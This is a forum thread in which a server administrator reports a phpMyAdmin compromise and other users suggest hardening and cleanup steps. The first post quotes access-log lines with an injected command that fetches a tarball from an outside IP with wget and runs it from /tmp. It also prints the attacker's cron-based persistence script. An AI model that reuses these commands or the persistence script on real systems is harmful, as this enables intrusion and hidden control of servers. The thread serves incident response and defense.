| View previous topic :: View next topic |
| Author |
Message |
marxin
n00b
Joined: 28 Oct 2005
Posts: 28
|
 Posted: Sun Nov 15, 2009 9:38 pm Post subject: Hacked via Apache, how to prevent |
 |
|
Hello everyone,
I got hacked my apache via phpmyadmin, I found that a command has been launched with the folloving code from apache access_log:
| Code: |
88.191.14.38 - - [07/Nov/2009:00:08:55 +0100] "GET /phpmyadmin/config/config.inc.php?p=phpinfo();c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck HTTP/1.1" 200 180
88.191.14.38 - - [07/Nov/2009:00:08:55 +0100] "GET /?c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck HTTP/1.1" 200 44132
|
ls of my phpmyadmin directory:
ls -l /var/www/localhost/htdocs/phpmyadmin/ | grep config
| Code: |
drwxr-xrwx 4 apache apache 224 Nov 15 22:32 config
|
all files for hack were downloaded to directory and there is ls:
| Code: |
marxin_server .pid # ls
1 b2 cron.d f fuck h init j2 mech.pid mech.set r sl stream v x
b bang.txt dir f4 fwd h.c j mech.levels mech.session plm.seen s std tty v2 y2kupdate
|
code of script which was executed at the startup of hack
| Code: |
#!/bin/sh
pwd > dir
dir=$(cat dir)
echo "* * * * * $dir/y2kupdate >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep y2kupdate
echo "#!/bin/sh
if test -r $dir/mech.pid; then
pid=\$(cat $dir/mech.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./r &>/dev/null" > y2kupdate
chmod u+x y2kupdate
|
Thank you for your advices and I hope you will help me how to fix this hole in my server.
marxin |
|
| Back to top |
|
 |
cach0rr0
Bodhisattva
Joined: 13 Nov 2008
Posts: 4123
Location: Houston, Republic of Texas
|
| Posted: Mon Nov 16, 2009 5:38 am Post subject: |
|
|
so my first thoughts
-I personally despise mod_security, as well despise the idea of running regex against web requests in general, nevermind doing so as a component of Apache itself; nonetheless, updated mod_security rules will protect against most of these hacks
-this is an ancient hack, and has likely been fixed in more recent revisions of phpmyadmin
-if you can, i would protect phpmyadmin with .htaccess/.htpasswd. meaning, require form-based auth before anyone can even get TO a position where they can attack phpmyadmin. For example, putting this in .htaccess
| Code: |
AuthUserFile /var/www/passwords
AuthName "Restricted Access"
AuthType Basic
require valid-user
|
then creating that file via
| Code: |
htpasswd -c /var/www/passwords someusername
<enter your password twice when prompted>
|
to add subsequent users, omit the -c switch
| Code: |
htpasswd /var/www/passwords anotherusername
|
In short, password-protect phpmyadmin directory
Just in general this should be done; do not give attackers a chance to attack your application directly, make them brute-force an apache password if they want to even have a CHANCE to attack an application
I do this with everything that isn't a standard html page. I *ESPECIALLY* do this with very common webapps, such as phpmyadmin, Horde, etc.
Now, with regards to tidying up your server, would highly recommend if you have physical access, booting from a thumb drive or cd/dvd and running rkhunter, chkrootkit, as well even clamscan (ClamAV). Personally even the slightest hack and I stop trusting my server, back things up, blow the server away and rebuild - but I'm paranoid in that respect.
Hope that helps.
_________________
Lost configuring your system?
dump lspci -n here | see Pappy's guide | Link Stash |
|
| Back to top |
|
|
aidanjt
Veteran
Joined: 20 Feb 2005
Posts: 1118
Location: Rep. of Ireland
|
| Posted: Mon Nov 16, 2009 5:45 am Post subject: |
|
|
Why is your phpmyadmin dir even apache writable in the first place?
chown -R root:apache * && find -type d -exec chmod 750 {} \; && find -type f -exec chmod 640 {} \;
That will close off that nasty little hole.
_________________
| juniper wrote: | | you experience political reality dilation when travelling at american political speeds. it's in einstein's formulas. it's not their fault. |
|
|
| Back to top |
|
|
Hu
Administrator
Joined: 06 Mar 2007
Posts: 23100
|
| Posted: Tue Nov 17, 2009 3:58 am Post subject: |
|
|
Why was /tmp mounted -o exec on a system with PHP installed?
Whoever wrote that hack should be smacked. That is a terrible shell script! First, there is no need to write the current directory to a temporary file just to load it into a variable. Second, crontab can be given data on stdin, so no need for the temporary cron.d, either. Third, the if test to see if anything was killed is wrong. Since all output is redirected to null, it is guaranteed to produce no output. The attacker should have tested the return code of the kill, not the amount of output it generated. Finally, since the attacker apparently wanted all output discarded, he should have just redirected output at the top of the script, rather than doing it for every child. |
|
| Back to top |
|
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
|
Networking & Security
